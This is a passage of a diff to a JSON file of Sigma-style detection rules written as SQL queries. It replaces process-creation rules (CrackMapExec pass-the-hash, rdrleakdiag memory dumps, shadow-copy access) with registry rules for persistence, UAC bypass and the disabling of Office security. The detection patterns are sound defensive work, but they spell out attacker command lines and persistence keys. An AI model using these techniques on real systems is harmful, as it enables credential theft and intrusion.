%' ESCAPE '\\' AND CommandLine LIKE '% -x %' ESCAPE '\\') OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -H ''NTHASH''%' ESCAPE '\\') OR (CommandLine LIKE '% mssql %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -H %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% --local-auth%' ESCAPE '\\')) OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% 10.%' ESCAPE '\\' AND CommandLine LIKE '% 192.168.%' ESCAPE '\\' AND CommandLine LIKE '%/24 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\Hangs\\\\Debugger%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_crackmapexec_execution.yml" + "filename": "registry_set_hangs_debugger_persistence.yml" }, { - "title": "Process Memory Dumped Via RdrLeakDiag.EXE", - "id": "6355a919-2e97-4285-a673-74645566340d", - "status": "experimental", - "description": "Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Environment Variable Has Been Registered", + "id": "966315ef-c5e1-4767-ba25-fce9c8de3660", + "status": "test", + "description": "Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.persistence" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rdrleakdiag.exe' ESCAPE '\\' AND CommandLine LIKE '%/fullmemdmp%' ESCAPE '\\') OR (CommandLine LIKE '%/fullmemdmp%' ESCAPE '\\' AND CommandLine LIKE '% /o %' ESCAPE '\\' AND CommandLine LIKE '% /p %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Environment\\\\%' ESCAPE '\\') AND (Details IN ('powershell', 'pwsh') OR (Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR Details LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR Details LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR Details LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR Details LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\' OR Details LIKE '%SW52b2tlL%' ESCAPE '\\' OR Details LIKE '%ludm9rZS%' ESCAPE '\\' OR Details LIKE '%JbnZva2Ut%' ESCAPE '\\' OR Details LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR Details LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR Details LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\') OR (Details LIKE 'SUVY%' ESCAPE '\\' OR Details LIKE 'SQBFAF%' ESCAPE '\\' OR Details LIKE 'SQBuAH%' ESCAPE '\\' OR Details LIKE 'cwBhA%' ESCAPE '\\' OR Details LIKE 'aWV4%' ESCAPE '\\' OR Details LIKE 'aQBlA%' ESCAPE '\\' OR Details LIKE 'R2V0%' ESCAPE '\\' OR Details LIKE 'dmFy%' ESCAPE '\\' OR Details LIKE 'dgBhA%' ESCAPE '\\' OR Details LIKE 'dXNpbm%' ESCAPE '\\' OR Details LIKE 'H4sIA%' ESCAPE '\\' OR Details LIKE 'Y21k%' ESCAPE '\\' OR Details LIKE 'cABhAH%' ESCAPE '\\' OR Details LIKE 'Qzpc%' ESCAPE '\\' OR Details LIKE 'Yzpc%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_rdrleakdiag.yml" + "filename": "registry_set_suspicious_env_variables.yml" }, { - "title": "Suspicious Regsvr32 Execution From Remote Share", - "id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "title": "Potential Persistence Via Outlook Home Page", + "id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", "status": "experimental", - "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential persistence activity via outlook home pages.", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.persistence", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\WebView\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\URL' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Calendar\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Inbox\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_remote_share.yml" + "filename": "registry_set_persistence_outlook_homepage.yml" }, { - "title": "Copy From VolumeShadowCopy Via Cmd.EXE", - "id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", - "status": "experimental", - "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "UAC Bypass Using Windows Media Player - Registry", + "id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "status": "test", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Backup scenarios using the commandline" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND Details = 'Binary Data')" ], - "filename": "proc_creation_win_cmd_shadowcopy_access.yml" + "filename": "registry_set_uac_bypass_wmp.yml" }, { - "title": "Fsutil Suspicious Invocation", - "id": "add64136-62e5-48ea-807e-88638d02df1e", - "status": "stable", - "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", - "author": "Ecco, E.M. Anhaus, oscd.community", + "title": "Scheduled TaskCache Change by Uncommon Program", + "id": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", + "status": "experimental", + "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", + "author": "Syed Hasan (@syedhasan009)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.persistence", + "attack.t1053", + "attack.t1053.005" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%deletejournal%' ESCAPE '\\' OR CommandLine LIKE '%createjournal%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%Microsoft\\\\Windows\\\\UpdateOrchestrator%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\SoftwareProtectionPlatform\\\\SvcRestartTask\\\\Index%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\Flighting\\\\OneSettings\\\\RefreshCache\\\\Index%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%\\\\ngen.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\.NET Framework\\\\.NET Framework NGEN%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\PLA\\\\Server Manager Performance Monitor\\\\%' ESCAPE '\\') OR (Image = 'System')))" ], - "filename": "proc_creation_win_fsutil_usage.yml" + "filename": "registry_set_taskcache_entry.yml" }, { - "title": "Mustang Panda Dropper", - "id": "2d87d610-d760-45ee-a7e6-7a6f2a65de00", + "title": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", + "id": "b64a026b-8deb-4c1d-92fd-98893209dff1", "status": "test", - "description": "Detects specific process parameters as used by Mustang Panda droppers", - "author": "Florian Roth (Nextron Systems), oscd.community", + "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", + "author": "frack113", "tags": [ - "attack.t1587.001", - "attack.resource_development" + "attack.persistence", + "attack.t1133" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Temp\\\\wtask.exe /create%' ESCAPE '\\' OR CommandLine LIKE '%\\%windir:~-3,1\\%\\%PUBLIC:~-9,1\\%%' ESCAPE '\\' OR CommandLine LIKE '%/tn \"Security Script %' ESCAPE '\\' OR CommandLine LIKE '%\\%windir:~-1,1\\%%' ESCAPE '\\') OR (CommandLine LIKE '%/E:vbscript%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\' AND CommandLine LIKE '%/F%' ESCAPE '\\') OR Image LIKE '%Temp\\\\winwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Software\\\\Wow6432Node\\\\Google\\\\Chrome\\\\Extensions%' ESCAPE '\\' AND TargetObject LIKE '%update\\_url' ESCAPE '\\' AND EventType = 'SetValue' AND (TargetObject LIKE '%fdcgdnkidjaadafnichfpabhfomcebme%' ESCAPE '\\' OR TargetObject LIKE '%fcfhplploccackoneaefokcmbjfbkenj%' ESCAPE '\\' OR TargetObject LIKE '%bihmplhobchoageeokmgbdihknkjbknd%' ESCAPE '\\' OR TargetObject LIKE '%gkojfkhlekighikafcpjkiklfbnlmeio%' ESCAPE '\\' OR TargetObject LIKE '%jajilbjjinjmgcibalaakngmkilboobh%' ESCAPE '\\' OR TargetObject LIKE '%gjknjjomckknofjidppipffbpoekiipm%' ESCAPE '\\' OR TargetObject LIKE '%nabbmpekekjknlbkgpodfndbodhijjem%' ESCAPE '\\' OR TargetObject LIKE '%kpiecbcckbofpmkkkdibbllpinceiihk%' ESCAPE '\\' OR TargetObject LIKE '%nlbejmccbhkncgokjcmghpfloaajcffj%' ESCAPE '\\' OR TargetObject LIKE '%omghfjlpggmjjaagoclmmobgdodcjboh%' ESCAPE '\\' OR TargetObject LIKE '%bibjcjfmgapbfoljiojpipaooddpkpai%' ESCAPE '\\' OR TargetObject LIKE '%mpcaainmfjjigeicjnlkdfajbioopjko%' ESCAPE '\\' OR TargetObject LIKE '%jljopmgdobloagejpohpldgkiellmfnc%' ESCAPE '\\' OR TargetObject LIKE '%lochiccbgeohimldjooaakjllnafhaid%' ESCAPE '\\' OR TargetObject LIKE '%nhnfcgpcbfclhfafjlooihdfghaeinfc%' ESCAPE '\\' OR TargetObject LIKE '%ookhnhpkphagefgdiemllfajmkdkcaim%' ESCAPE '\\' OR TargetObject LIKE '%namfblliamklmeodpcelkokjbffgmeoo%' ESCAPE '\\' OR TargetObject LIKE '%nbcojefnccbanplpoffopkoepjmhgdgh%' ESCAPE '\\' OR TargetObject LIKE '%majdfhpaihoncoakbjgbdhglocklcgno%' ESCAPE '\\' OR TargetObject LIKE '%lnfdmdhmfbimhhpaeocncdlhiodoblbd%' ESCAPE '\\' OR TargetObject LIKE '%eppiocemhmnlbhjplcgkofciiegomcon%' ESCAPE '\\' OR TargetObject LIKE '%cocfojppfigjeefejbpfmedgjbpchcng%' ESCAPE '\\' OR TargetObject LIKE '%foiopecknacmiihiocgdjgbjokkpkohc%' ESCAPE '\\' OR TargetObject LIKE '%hhdobjgopfphlmjbmnpglhfcgppchgje%' ESCAPE '\\' OR TargetObject LIKE '%jgbaghohigdbgbolncodkdlpenhcmcge%' ESCAPE '\\' OR TargetObject LIKE '%inligpkjkhbpifecbdjhmdpcfhnlelja%' ESCAPE '\\' OR TargetObject LIKE '%higioemojdadgdbhbbbkfbebbdlfjbip%' ESCAPE '\\' OR TargetObject LIKE '%hipncndjamdcmphkgngojegjblibadbe%' ESCAPE '\\' OR TargetObject LIKE '%iolonopooapdagdemdoaihahlfkncfgg%' ESCAPE '\\' OR TargetObject LIKE '%nhfjkakglbnnpkpldhjmpmmfefifedcj%' ESCAPE '\\' OR TargetObject LIKE '%jpgljfpmoofbmlieejglhonfofmahini%' ESCAPE '\\' OR TargetObject LIKE '%fgddmllnllkalaagkghckoinaemmogpe%' ESCAPE '\\' OR TargetObject LIKE '%ejkaocphofnobjdedneohbbiilggdlbi%' ESCAPE '\\' OR TargetObject LIKE '%keodbianoliadkoelloecbhllnpiocoi%' ESCAPE '\\' OR TargetObject LIKE '%hoapmlpnmpaehilehggglehfdlnoegck%' ESCAPE '\\' OR TargetObject LIKE '%poeojclicodamonabcabmapamjkkmnnk%' ESCAPE '\\' OR TargetObject LIKE '%dfkdflfgjdajbhocmfjolpjbebdkcjog%' ESCAPE '\\' OR TargetObject LIKE '%kcdahmgmaagjhocpipbodaokikjkampi%' ESCAPE '\\' OR TargetObject LIKE '%klnkiajpmpkkkgpgbogmcgfjhdoljacg%' ESCAPE '\\' OR TargetObject LIKE '%lneaocagcijjdpkcabeanfpdbmapcjjg%' ESCAPE '\\' OR TargetObject LIKE '%pgfpignfckbloagkfnamnolkeaecfgfh%' ESCAPE '\\' OR TargetObject LIKE '%jplnlifepflhkbkgonidnobkakhmpnmh%' ESCAPE '\\' OR TargetObject LIKE '%jliodmnojccaloajphkingdnpljdhdok%' ESCAPE '\\' OR TargetObject LIKE '%hnmpcagpplmpfojmgmnngilcnanddlhb%' ESCAPE '\\' OR TargetObject LIKE '%ffbkglfijbcbgblgflchnbphjdllaogb%' ESCAPE '\\' OR TargetObject LIKE '%kcndmbbelllkmioekdagahekgimemejo%' ESCAPE '\\' OR TargetObject LIKE '%jdgilggpfmjpbodmhndmhojklgfdlhob%' ESCAPE '\\' OR TargetObject LIKE '%bihhflimonbpcfagfadcnbbdngpopnjb%' ESCAPE '\\' OR TargetObject LIKE '%ppajinakbfocjfnijggfndbdmjggcmde%' ESCAPE '\\' OR TargetObject LIKE '%oofgbpoabipfcfjapgnbbjjaenockbdp%' ESCAPE '\\' OR TargetObject LIKE '%bhnhkdgoefpmekcgnccpnhjfdgicfebm%' ESCAPE '\\' OR TargetObject LIKE '%knmmpciebaoojcpjjoeonlcjacjopcpf%' ESCAPE '\\' OR TargetObject LIKE '%dhadilbmmjiooceioladdphemaliiobo%' ESCAPE '\\' OR TargetObject LIKE '%jedieiamjmoflcknjdjhpieklepfglin%' ESCAPE '\\' OR TargetObject LIKE '%mhngpdlhojliikfknhfaglpnddniijfh%' ESCAPE '\\' OR TargetObject LIKE '%omdakjcmkglenbhjadbccaookpfjihpa%' ESCAPE '\\' OR TargetObject LIKE '%npgimkapccfidfkfoklhpkgmhgfejhbj%' ESCAPE '\\' OR TargetObject LIKE '%akeehkgglkmpapdnanoochpfmeghfdln%' ESCAPE '\\' OR TargetObject LIKE '%gbmdmipapolaohpinhblmcnpmmlgfgje%' ESCAPE '\\' OR TargetObject LIKE '%aigmfoeogfnljhnofglledbhhfegannp%' ESCAPE '\\' OR TargetObject LIKE '%cgojmfochfikphincbhokimmmjenhhgk%' ESCAPE '\\' OR TargetObject LIKE '%ficajfeojakddincjafebjmfiefcmanc%' ESCAPE '\\' OR TargetObject LIKE '%ifnaibldjfdmaipaddffmgcmekjhiloa%' ESCAPE '\\' OR TargetObject LIKE '%jbnmpdkcfkochpanomnkhnafobppmccn%' ESCAPE '\\' OR TargetObject LIKE '%apcfdffemoinopelidncddjbhkiblecc%' ESCAPE '\\' OR TargetObject LIKE '%mjolnodfokkkaichkcjipfgblbfgojpa%' ESCAPE '\\' OR TargetObject LIKE '%oifjbnnafapeiknapihcmpeodaeblbkn%' ESCAPE '\\' OR TargetObject LIKE '%plpmggfglncceinmilojdkiijhmajkjh%' ESCAPE '\\' OR TargetObject LIKE '%mjnbclmflcpookeapghfhapeffmpodij%' ESCAPE '\\' OR TargetObject LIKE '%bblcccknbdbplgmdjnnikffefhdlobhp%' ESCAPE '\\' OR TargetObject LIKE '%aojlhgbkmkahabcmcpifbolnoichfeep%' ESCAPE '\\' OR TargetObject LIKE '%lcmammnjlbmlbcaniggmlejfjpjagiia%' ESCAPE '\\' OR TargetObject LIKE '%knajdeaocbpmfghhmijicidfcmdgbdpm%' ESCAPE '\\' OR TargetObject LIKE '%bdlcnpceagnkjnjlbbbcepohejbheilk%' ESCAPE '\\' OR TargetObject LIKE '%edknjdjielmpdlnllkdmaghlbpnmjmgb%' ESCAPE '\\' OR TargetObject LIKE '%eidnihaadmmancegllknfbliaijfmkgo%' ESCAPE '\\' OR TargetObject LIKE '%ckiahbcmlmkpfiijecbpflfahoimklke%' ESCAPE '\\' OR TargetObject LIKE '%macdlemfnignjhclfcfichcdhiomgjjb%' ESCAPE '\\' OR TargetObject LIKE '%chioafkonnhbpajpengbalkececleldf%' ESCAPE '\\' OR TargetObject LIKE '%amnoibeflfphhplmckdbiajkjaoomgnj%' ESCAPE '\\' OR TargetObject LIKE '%llbhddikeonkpbhpncnhialfbpnilcnc%' ESCAPE '\\' OR TargetObject LIKE '%pcienlhnoficegnepejpfiklggkioccm%' ESCAPE '\\' OR TargetObject LIKE '%iocnglnmfkgfedpcemdflhkchokkfeii%' ESCAPE '\\' OR TargetObject LIKE '%igahhbkcppaollcjeaaoapkijbnphfhb%' ESCAPE '\\' OR TargetObject LIKE '%njpmifchgidinihmijhcfpbdmglecdlb%' ESCAPE '\\' OR TargetObject LIKE '%ggackgngljinccllcmbgnpgpllcjepgc%' ESCAPE '\\' OR TargetObject LIKE '%kchocjcihdgkoplngjemhpplmmloanja%' ESCAPE '\\' OR TargetObject LIKE '%bnijmipndnicefcdbhgcjoognndbgkep%' ESCAPE '\\' OR TargetObject LIKE '%lklekjodgannjcccdlbicoamibgbdnmi%' ESCAPE '\\' OR TargetObject LIKE '%dbdbnchagbkhknegmhgikkleoogjcfge%' ESCAPE '\\' OR TargetObject LIKE '%egblhcjfjmbjajhjhpmnlekffgaemgfh%' ESCAPE '\\' OR TargetObject LIKE '%ehbhfpfdkmhcpaehaooegfdflljcnfec%' ESCAPE '\\' OR TargetObject LIKE '%bkkgdjpomdnfemhhkalfkogckjdkcjkg%' ESCAPE '\\' OR TargetObject LIKE '%almalgbpmcfpdaopimbdchdliminoign%' ESCAPE '\\' OR TargetObject LIKE '%akkbkhnikoeojlhiiomohpdnkhbkhieh%' ESCAPE '\\' OR TargetObject LIKE '%gbfgfbopcfokdpkdigfmoeaajfmpkbnh%' ESCAPE '\\' OR TargetObject LIKE '%bniikohfmajhdcffljgfeiklcbgffppl%' ESCAPE '\\' OR TargetObject LIKE '%lejgfmmlngaigdmmikblappdafcmkndb%' ESCAPE '\\' OR TargetObject LIKE '%ffhhkmlgedgcliajaedapkdfigdobcif%' ESCAPE '\\' OR TargetObject LIKE '%gcknhkkoolaabfmlnjonogaaifnjlfnp%' ESCAPE '\\' OR TargetObject LIKE '%pooljnboifbodgifngpppfklhifechoe%' ESCAPE '\\' OR TargetObject LIKE '%fjoaledfpmneenckfbpdfhkmimnjocfa%' ESCAPE '\\' OR TargetObject LIKE '%aakchaleigkohafkfjfjbblobjifikek%' ESCAPE '\\' OR TargetObject LIKE '%dpplabbmogkhghncfbfdeeokoefdjegm%' ESCAPE '\\' OR TargetObject LIKE '%padekgcemlokbadohgkifijomclgjgif%' ESCAPE '\\' OR TargetObject LIKE '%bfidboloedlamgdmenmlbipfnccokknp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_mustangpanda.yml" + "filename": "registry_set_chrome_extension.yml" }, { - "title": "Possible Privilege Escalation via Weak Service Permissions", - "id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", - "status": "test", - "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", - "author": "Teymur Kheirkhabarov", + "title": "Potential Persistence Via TypedPaths", + "id": "086ae989-9ca6-4fe7-895a-759c5544f247", + "status": "experimental", + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND IntegrityLevel = 'Medium') AND ((CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\') OR (CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\explorer.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" + "filename": "registry_set_persistence_typed_paths.yml" }, { - "title": "Execution via WorkFolders.exe", - "id": "0bbc6369-43e3-453d-9944-cae58821c173", + "title": "Disable Microsoft Office Security Features", + "id": "7c637634-c95d-4bbf-b26c-a82510874b34", "status": "test", - "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", - "author": "Maxime Thiebaut (@0xThiebaut)", + "description": "Disable Microsoft Office Security Features by registry", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate usage of the uncommon Windows Work Folders feature." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\WorkFolders.exe' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%VBAWarnings' ESCAPE '\\' OR TargetObject LIKE '%DisableInternetFilesInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableUnsafeLocationsInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableAttachementsInPV' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_susp_workfolders.yml" + "filename": "registry_set_disable_microsoft_office_security_features.yml" }, { - "title": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", - "id": "044ba588-dff4-4918-9808-3f95e8160606", + "title": "Modify User Shell Folders Startup Value", + "id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", "status": "experimental", - "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", + "author": "frack113", "tags": [ - "attack.credential_access" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' AND TargetObject LIKE '%Startup' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml" + "filename": "registry_set_susp_user_shell_folders.yml" }, { - "title": "HackTool - PowerTool Execution", - "id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", + "title": "Potential Persistence Via Mpnotify", + "id": "92772523-d9c1-4c93-9547-b0ca500baba3", "status": "experimental", - "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence" ], "falsepositives": [ - "Unlikely" + "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PowerTool.exe' 